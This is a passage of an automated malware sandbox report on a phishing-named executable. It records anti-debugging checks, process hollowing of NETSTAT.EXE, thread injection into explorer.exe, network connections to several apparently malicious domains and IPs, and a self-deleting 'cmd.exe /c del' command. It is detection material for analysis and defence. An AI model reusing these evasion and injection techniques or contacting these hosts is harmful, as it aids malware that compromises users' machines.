Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038203E2 mov eax, dword ptr fs:[00000030h]		14_2_038203E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038203E2 mov eax, dword ptr fs:[00000030h]		14_2_038203E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038203E2 mov eax, dword ptr fs:[00000030h]		14_2_038203E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038203E2 mov eax, dword ptr fs:[00000030h]		14_2_038203E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038203E2 mov eax, dword ptr fs:[00000030h]		14_2_038203E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038203E2 mov eax, dword ptr fs:[00000030h]		14_2_038203E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381DBE9 mov eax, dword ptr fs:[00000030h]		14_2_0381DBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038A23E3 mov ecx, dword ptr fs:[00000030h]		14_2_038A23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038A23E3 mov ecx, dword ptr fs:[00000030h]		14_2_038A23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038A23E3 mov eax, dword ptr fs:[00000030h]		14_2_038A23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309 mov eax, dword ptr fs:[00000030h]		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B131B mov eax, dword ptr fs:[00000030h]		14_2_038B131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C8B58 mov eax, dword ptr fs:[00000030h]		14_2_038C8B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03823B7A mov eax, dword ptr fs:[00000030h]		14_2_03823B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03823B7A mov eax, dword ptr fs:[00000030h]		14_2_03823B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382D294 mov eax, dword ptr fs:[00000030h]		14_2_0382D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382D294 mov eax, dword ptr fs:[00000030h]		14_2_0382D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0380AAB0 mov eax, dword ptr fs:[00000030h]		14_2_0380AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0380AAB0 mov eax, dword ptr fs:[00000030h]		14_2_0380AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382FAB0 mov eax, dword ptr fs:[00000030h]		14_2_0382FAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_037F9240 mov eax, dword ptr fs:[00000030h]		14_2_037F9240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_037F9240 mov eax, dword ptr fs:[00000030h]		14_2_037F9240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_037F9240 mov eax, dword ptr fs:[00000030h]		14_2_037F9240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_037F9240 mov eax, dword ptr fs:[00000030h]		14_2_037F9240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03822ACB mov eax, dword ptr fs:[00000030h]		14_2_03822ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B4AEF mov eax, dword ptr fs:[00000030h]		14_2_038B4AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B4AEF mov eax, dword ptr fs:[00000030h]		14_2_038B4AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B4AEF mov eax, dword ptr fs:[00000030h]		14_2_038B4AEF

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Order No00020212910.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Order No00020212910.exe

Code function: 5_2_00409B50 LdrLoadDll,

5_2_00409B50

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\Desktop\Order No00020212910.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.beautyloungeacademyllc.com
Source: C:\Windows\explorer.exe	Domain query: www.collegedalerealtor.com
Source: C:\Windows\explorer.exe	Domain query: www.inkedbreadco.com
Source: C:\Windows\explorer.exe	Network Connect: 34.98.99.30 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 74.220.199.6 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 44.227.76.166 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.xpatfone.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.xrxgqf.website
Source: C:\Windows\explorer.exe	Domain query: www.shoppingvipshopping.space
Source: C:\Windows\explorer.exe	Domain query: www.lasnochesdeluces.com

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Order No00020212910.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: CB0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Order No00020212910.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Order No00020212910.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Order No00020212910.exe	Thread register set: target process: 3352			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Thread register set: target process: 3352			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 3352			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Order No00020212910.exe	Process created: C:\Users\user\Desktop\Order No00020212910.exe C:\Users\user\Desktop\Order No00020212910.exe			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order No00020212910.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 0000000A.00000000.308770046.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000E.00000002.542460488.0000000005BF0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.321178794.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000A.00000000.308770046.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000E.00000002.542460488.0000000005BF0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.308770046.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000E.00000002.542460488.0000000005BF0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.308770046.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000E.00000002.542460488.0000000005BF0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.297928991.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Users\user\Desktop\Order No00020212910.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation			Jump to behavior
